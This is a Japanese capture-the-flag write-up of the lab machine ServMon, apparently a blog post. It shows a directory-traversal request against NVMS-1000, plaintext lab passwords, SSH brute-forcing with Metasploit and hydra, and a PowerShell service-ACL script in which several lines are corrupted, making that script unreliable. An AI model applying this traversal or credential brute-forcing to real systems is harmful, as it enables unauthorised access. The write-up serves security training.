💨

ServMon_HTB

2023/12/26に公開

This Machine

概要

  • ServMon は、NVMS-1000 をホストする HTTP サーバーを備えた簡単な Windows マシンです。
    • (ネットワーク監視管理ソフトウェア) インスタンス。 これは LFI に対して脆弱であることが判明しています。
    • これは、ユーザーのデスクトップ上のパスワードのリストを読み取るために使用されます。 認証情報を使用して SSH 接続できます
  • 2 番目のユーザーとしてサーバーに接続します。 この低い特権を持つユーザーとして、システムを列挙することができます。
    NSClient++ (システム監視エージェント) のパスワードを見つけます。
    • SSH作成後トンネルを作成すると、NSClient++ Web アプリにアクセスできます。
    • アプリにはスクリプトを作成する機能が含まれています
      • これは NT AUTHORITY\SYSTEM のコンテキストで実行できます。
      • ユーザーに与えられたNSCP サービスを再起動する権限があり、悪意のあるスクリプトを作成した後、サービスは
        再起動され、SYSTEM としてコマンドが実行されます。

SCAN

┌──(kali㉿kali)-[~]
└─$ nmap -p1-10000 -sC -sV -Pn 10.10.10.184
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-25 23:07 EST
Nmap scan report for 10.10.10.184
Host is up (0.61s latency).
Not shown: 9990 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22  06:35PM       <DIR>          Users
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 c71af681ca1778d027dbcd462a092b54 (RSA)
|   256 3e63ef3b6e3e4a90f34c02e940672e42 (ECDSA)
|_  256 5a48c8cd39782129effbae821d03adaf (ED25519)
80/tcp   open  http
| fingerprint-strings: 
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL: 
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6063/tcp open  x11?
6699/tcp open  napster?
8443/tcp open  ssl/https-alt
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     iday
|     Sat:Saturday
|     workers
|_    jobs
| http-title: NSClient++
|_Requested resource was /index.html
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.93%I=7%D=12/25%Time=658A53EA%P=x86_64-pc-linux-gnu%r(NUL
SF:L,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/h
SF:tml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\
SF:n\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20te
SF:xt/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\
SF:x20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20
SF:XHTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/
SF:DTD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\
SF:.org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20
SF:\x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x
SF:20\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n"
SF:)%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r
SF:\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML
SF:\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/x
SF:html1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/
SF:1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\
SF:x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x2
SF:0\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(R
SF:TSPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\
SF:nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\
SF:n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201
SF:\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1
SF:-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/
SF:xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x
SF:20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20
SF:\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.93%T=SSL%I=7%D=12/25%Time=658A53F6%P=x86_64-pc-linux-g
SF:nu%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocatio
SF:n:\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0iday\0Sat:Saturday\0\0\x1
SF:2\x02\x18\0\x1aE\n\x07workers\x12\x0b\n\x04jobs\x12\x03\x18\xdaL\x12")%
SF:r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocu
SF:ment\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\.1\x20404\r\nCont
SF:ent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(RTSPRequest,36,"H
SF:TTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20foun
SF:d")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nD
SF:ocument\x20not\x20found");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -7s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-12-26T04:20:08
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 820.57 seconds
  • nmap評価
    • ftpがアノニマスログインが有効となっているため当初ftpでのログインを試行する。

FTPログイン

┌──(kali㉿kali)-[~]
└─$ ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50426|)
125 Data connection already open; Transfer starting.
02-28-22  06:35PM       <DIR>          Users
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50427|)
125 Data connection already open; Transfer starting.
02-28-22  06:36PM       <DIR>          Nadine
02-28-22  06:37PM       <DIR>          Nathan
226 Transfer complete.
ftp> cd 
ftp> anonymous
?Invalid command.
ftp> cd Nadine
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50428|)
125 Data connection already open; Transfer starting.
02-28-22  06:36PM                  168 Confidential.txt
226 Transfer complete.
ftp> get Confidential.txt
local: Confidential.txt remote: Confidential.txt
229 Entering Extended Passive Mode (|||50429|)
125 Data connection already open; Transfer starting.
100% |**************************|   168        0.47 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 6 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
168 bytes received in 00:00 (0.29 KiB/s)
ftp> cd ../
250 CWD command successful.
ftp> cd Nathan
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50430|)
125 Data connection already open; Transfer starting.
02-28-22  06:36PM                  182 Notes to do.txt
226 Transfer complete.
ftp> get "Notes to do.txt"
local: Notes to do.txt remote: Notes to do.txt
229 Entering Extended Passive Mode (|||50431|)
125 Data connection already open; Transfer starting.
100% |**************************|   182        0.49 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 4 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
182 bytes received in 00:00 (0.30 KiB/s)
  • getしたファイルを確認
┌──(kali㉿kali)-[~]
└─$ cat Confidential.txt 
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine  
  • 和訳
Passwords.txt ファイルをデスクトップに残しました。 自分で編集したらこれを削除し、安全なフォルダーに戻してください。
┌──(kali㉿kali)-[~]
└─$ cat 'Notes to do.txt' 
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
  • 評価
    • Notes to do.txt には、インストールされている監視アプリの完了したタスクと未処理のタスクに関する情報が含まれています。

web access

  • 通常にアクセスする。
  • 評価
    • デフォルトパスワードではログイン不可
    • 参考:https://www.akakagemaru.info/port/webcam-wifichange.html
  • 8443にアクセス
  • 評価
    • 何も表示されないため別手段を検討

Burpを使用してLFIの脆弱性を確認する。

NVMSの脆弱性確認

┌──(kali㉿kali)-[~]
└─$ searchsploit nvms
------------------------------------- ---------------------------------
 Exploit Title                       |  Path
------------------------------------- ---------------------------------
NVMS 1000 - Directory Traversal      | hardware/webapps/47774.txt
OpenVms 5.3/6.2/7.x - UCX POP Server | multiple/local/21856.txt
OpenVms 8.3 Finger Service - Stack B | multiple/dos/32193.txt
TVT NVMS 1000 - Directory Traversal  | hardware/webapps/48311.py
------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~]
└─$ searchsploit -m 47774  
  Exploit: NVMS 1000 - Directory Traversal
      URL: https://www.exploit-db.com/exploits/47774
     Path: /usr/share/exploitdb/exploits/hardware/webapps/47774.txt
    Codes: N/A
 Verified: False
File Type: Unicode text, UTF-8 text
Copied to: /home/kali/47774.txt                           
┌──(kali㉿kali)-[~]
└─$ cat 47774.txt        
# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html

POC
---------

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Burpのセッティング

  • ProxyのresponceもInterceptするように設定する。
    • requestと同様にチェックする

脆弱性試行

  • txtと同様に施行する。
    GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1

  • win.ini ファイルは Windows インストール上に存在し、すべてのユーザーが読み取ることができるため、LFI を検証するのに適したターゲットです。
  • Desktopにあると情報があったのでディレクトリトラバーサルを行う。
    GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1

ssh試行

msfconsoleを利用する場合

  • 上記のBurpで取得したPasswordや現段階で取得したUser名および一般的な名前を利用してログイン施行を行う。
┌──(kali㉿kali)-[~/ServMon]
└─$ cat passwords.txt 
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
                                                                       
┌──(kali㉿kali)-[~/ServMon]
└─$ cat users.txt    
Nadine
nadine
Nathan
nathan
admin
Admin
Administrator
administrator
  • msfconsoleでアクセス試行
┌──(kali㉿kali)-[~/ServMon]
└─$ msfconsole -q

msf6 > 
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.10.10.184
RHOSTS => 10.10.10.184
msf6 auxiliary(scanner/ssh/ssh_login) > set USER_FILE users.txt
USER_FILE => users.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE passwords.txt 
USERPASS_FILE => passwords.txt
msf6 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   BLANK_PASSWORDS  false            no        Try blank passwords fo
                                               r all users
   BRUTEFORCE_SPEE  5                yes       How fast to bruteforce
   D                                           , from 0 to 5
   DB_ALL_CREDS     false            no        Try each user/password
                                                couple stored in the
                                               current database
   DB_ALL_PASS      false            no        Add all passwords in t
                                               he current database to
                                                the list
   DB_ALL_USERS     false            no        Add all users in the c
                                               urrent database to the
                                                list
   DB_SKIP_EXISTIN  none             no        Skip existing credenti
   G                                           als stored in the curr
                                               ent database (Accepted
                                               : none, user, user&rea
                                               lm)
   PASSWORD                          no        A specific password to
                                                authenticate with
   PASS_FILE        passwords.txt    no        File containing passwo
                                               rds, one per line
   RHOSTS           10.10.10.184     yes       The target host(s), se
                                               e https://docs.metaspl
                                               oit.com/docs/using-met
                                               asploit/basics/using-m
                                               etasploit.html
   RPORT            22               yes       The target port
   STOP_ON_SUCCESS  false            yes       Stop guessing when a c
                                               redential works for a
                                               host
   THREADS          1                yes       The number of concurre
                                               nt threads (max one pe
                                               r host)
   USERNAME                          no        A specific username to
                                                authenticate as
   USERPASS_FILE    passwords.txt    no        File containing users
                                               and passwords separate
                                               d by space, one pair p
                                               er line
   USER_AS_PASS     false            no        Try the username as th
                                               e password for all use
                                               rs
   USER_FILE        users.txt        no        File containing userna
                                               mes, one per line
   VERBOSE          false            yes       Whether to print outpu
                                               t for all attempts


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 10.10.10.184:22 - Starting bruteforce
[+] 10.10.10.184:22 - Success: 'Nadine:L1k3B1gBut7s@W0rk' 'Microsoft Windows [Version 10.0.17763.864]'
[*] SSH session 1 opened (10.10.16.2:35313 -> 10.10.10.184:22) at 2023-12-26 02:55:42 -0500
[+] 10.10.10.184:22 - Success: 'nadine:L1k3B1gBut7s@W0rk' 'Microsoft Windows [Version 10.0.17763.864]'
[*] SSH session 2 opened (10.10.16.2:34081 -> 10.10.10.184:22) at 2023-12-26 02:56:08 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > showsessions
[-] Unknown command: showsessions
msf6 auxiliary(scanner/ssh/ssh_login) > show sessions

Active sessions
===============

  Id  Name  Type           Information  Connection
  --  ----  ----           -----------  ----------
  1         shell windows  SSH kali @   10.10.16.2:35313 -> 10.10.10.
                                        184:22 (10.10.10.184)
  2         shell windows  SSH kali @   10.10.16.2:34081 -> 10.10.10.
                                        184:22 (10.10.10.184)

hydraを利用する場合

┌──(kali㉿kali)-[~/ServMon]
└─$ hydra -L users.txt -P passwords.txt 10.10.10.184 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-26 05:33:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 56 login tries (l:8/p:7), ~4 tries per task
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184   login: nadine   password: L1k3B1gBut7s@W0rk                                                                    
[22][ssh] host: 10.10.10.184   login: Nadine   password: L1k3B1gBut7s@W0rk                                                                    
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-26 05:33:55

┌──(kali㉿kali)-[~/ServMon]
└─$ ssh nadine@10.10.10.184     
The authenticity of host '10.10.10.184 (10.10.10.184)' can't be established.
ED25519 key fingerprint is SHA256:WctzSeuXs6dqa7LqHkfVZ38Pppc/KRlSmEvNtPlwSoQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.184' (ED25519) to the list of known hosts.
nadine@10.10.10.184's password: 
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State     
============================= ============================== =======   
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled   
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled   

nadine@SERVMON C:\Users\Nadine>

Privilege Escalation

ディレクトリの調査

  • Program Files に入ると、FTP ログイン中に見つかった Notes ファイルに記載されている NSClient という名前の別の興味深いディレクトリが見つかりました。
  • 次に、NSClient ディレクトリの内部を見てみましょう。
PS C:\Program Files\NSClient++> gc nsclient.ini
# If you want to fill this file with all available options run the foll
owing command:
#   nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:   
#   nscp settings --activate-module <MODULE NAME> --add-defaults       
# For details run: nscp settings --help


; in flight - TODO
[/settings/default]

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1


; in flight - TODO
[/settings/NRPE/server]

; Undocumented key
ssl options = no-sslv2,no-sslv3

; Undocumented key
verify mode = peer-cert

; Undocumented key
insecure = false


; in flight - TODO 
[/modules]

; Undocumented key
CheckHelpers = disabled

; Undocumented key
CheckEventLog = disabled

; Undocumented key
CheckNSCP = disabled

; Undocumented key
CheckDisk = disabled

; Undocumented key
CheckSystem = disabled

; Undocumented key
WEBServer = enabled

; Undocumented key
NRPEServer = enabled

; CheckTaskSched - Check status of your scheduled jobs.
CheckTaskSched = enabled

; Scheduler - Use this to schedule check commands and jobs in conjuncti
on with for instance passive monitoring through NSCA
Scheduler = enabled

; CheckExternalScripts - Module used to execute external scripts       
CheckExternalScripts = enabled


; Script wrappings - A list of templates for defining script commands. 
Enter any command line here and they will be expanded by scripts placed
 under the wrapped scripts section. %SCRIPT% will be replaced by the ac
tual script an %ARGS% will be replaced by any given arguments.
[/settings/external scripts/wrappings]

; Batch file - Command used for executing wrapped batch files
bat = scripts\\%SCRIPT% %ARGS%

; Visual basic script - Command line used for wrapped vbs scripts      
vbs = cscript.exe //T:30 //NoLogo scripts\\lib\\wrapper.vbs %SCRIPT% %A
RGS%

; POWERSHELL WRAPPING - Command line used for executing wrapped ps1 (po
wershell) scripts
ps1 = cmd /c echo If (-Not (Test-Path "scripts\%SCRIPT%") ) { Write-Hos
t "UNKNOWN: Script `"%SCRIPT%`" not found."; exit(3) }; scripts\%SCRIPT
% $ARGS$; exit($lastexitcode) | powershell.exe /noprofile -command -   


; External scripts - A list of scripts available to run from the CheckE
xternalScripts module. Syntax is: `command=script arguments`
[/settings/external scripts/scripts]


; Schedules - Section for the Scheduler module.
[/settings/scheduler/schedules]

; Undocumented key
foobar = command = foobar


; External script settings - General settings for the external scripts 
module (CheckExternalScripts).
[/settings/external scripts]
allow arguments = true
  • コマンドの補足
    • gcコマンド:get-content コマンドレットでテキストファイルの中身を出力
    • .iniファイル:INIファイルは、ソフトウェアの設定などを記録するために用いられるファイル形式の一つ。
      • 構造の単純なテキストファイルであり、設定ファイルのフォーマットとしてよく使われている

nscp.exeのバージョン確認

  • ExploitDBにnscpの脆弱性情報がある
    Exploit DB
PS C:\Program Files\NSClient++> cmd /c "C:\Program Files\NSClient++\nsc
p.exe" --version                                                       
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64
  • NSClient は NT AUTHORITY\SYSTEM のコンテキストで実行される。
    • このエクスプロイトが機能するための前提条件は、サービスの再起動です。
    • Rohn Edwards によるPowerShell でサービス権限を取得する方法を示しています。
      • Msxml2.XMLHTTP COM オブジェクト ダウンロード クレードルを使用して、スクリプトをメモリにダウンロードして実行できます。
      • ただし、サービス コントロール マネージャーへのアクセスは拒否されるため、サービスの再起動権限を想定する必要があります。
  • Get-ServiceACL.ps1
┌──(kali㉿kali)-[~/ServMon]
└─$ cat Get-ServiceACL.ps1 
Add-Type  @"
  [System.FlagsAttribute]
  public enum ServiceAccessFlags : uint
  {
      QueryConfig = 1,
      ChangeConfig = 2,
      QueryStatus = 4,
      EnumerateDependents = 8,
      Start = 16,
      Stop = 32,
      PauseContinue = 64,
      Interrogate = 128,
      UserDefinedControl = 256,
      Delete = 65536,
      ReadControl = 131072,
      WriteDac = 262144,
      WriteOwner = 524288,
      Synchronize = 1048576,
      AccessSystemSecurity = 16777216,
      GenericAll = 268435456,
      GenericExecute = 536870912,
      GenericWrite = 1073741824,
      GenericRead = 2147483648
  }
"@
 
function Get-ServiceAcl {
    [CmdletBinding(DefaultParameterSetName="ByName")]
    param(
        [Parameter(Mandatory=$true, Position=0, ValueFromPipeline=$true, ParameterSetName="ByName")]
        [string[]] $Name,
        [Parameter(Mandatory=$true, Position=0, ParameterSetName="ByDisplayName")]
        [string[]] $DisplayName,
        [Parameter(Mandatory=$false, Position=1)]
        [string] $ComputerName = $env:COMPUTERNAME
    )
 
    # If display name was provided, get the actual service name:
    switch ($PSCmdlet.ParameterSetName) {
        "ByDisplayName" {
            $Name = Get-Service -DisplayName $DisplayName -ComputerName $ComputerName -ErrorAction Stop | 
                Select-Object -ExpandProperty Name
        }
    }
 
    # Make sure computer has 'sc.exe':
    $ServiceControlCmd = Get-Command "$env:SystemRoot\system32\sc.exe"
    if (-not $ServiceControlCmd) {
        throw "Could not find $env:SystemRoot\system32\sc.exe command!"
    }
 
    # Get-Service does the work looking up the service the user requested:
    Get-Service -Name $Name | ForEach-Object {
         
        # We might need this info in catch block, so store it to a variable
        $CurrentName = $_.Name
 
        # Get SDDL using sc.exe
        $Sddl = & $ServiceControlCmd.Definition "\\$ComputerName" sdshow "$CurrentName" | Where-Object { $_ }
 
        try {
            # Get the DACL from the SDDL string
            $Dacl = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)
        }
        catch {
            Write-Warning "Couldn't get security descriptor for service '$CurrentName': $Sddl"
            return
        }
 
        # Create the custom object with the note properties
        $CustomObject = New-Object -TypeName PSObject -Property ([ordered] @{ Name = $_.Name
                                                                              Dacl = $Dacl
                                                                            })
 
        # Add the 'Access' property:
        $CustomObject | Add-Member -MemberType ScriptProperty -Name Access -Value {
            $this.Dacl.DiscretionaryAcl | ForEach-Object {
                $CurrentDacl = $_
 
                try {
                    $IdentityReference = $CurrentDacl.SecurityIdentifier.Translate([System.Security.Principal.NTAccount])
                }
                catch {
                    $IdentityReference = $CurrentDacl.SecurityIdentifier.Value
                }
                 
                New-Object -TypeName PSObject -Property ([ordered] @{ 
                                ServiceRights = [ServiceAccessFlags] $CurrentDacl.AccessMask
                                AccessControlType = $CurrentDacl.AceType
                                IdentityReference = $IdentityReference
                                IsInherited = $CurrentDacl.IsInherited
                                InheritanceFlags = $CurrentDacl.InheritanceFlags
                                PropagationFlags = $CurrentDacl.PrtionFlags
                                                                  
            }
        }
 
        # Add 'AccessToString' property that mimics a property of ame name from normal Get-Acl call
        $CustomObject | Add-Member -MemberType ScriptProperty -NamessToString -Value {
            $this.Access | ForEach-Object {
                "{0} {1} {2}" -f $_.IdentityReference, $_.AccessCoType, $_.ServiceRights
            } | Out-String
        }
 
        $CustomObject
    }
}

以下進めず失敗

Discussion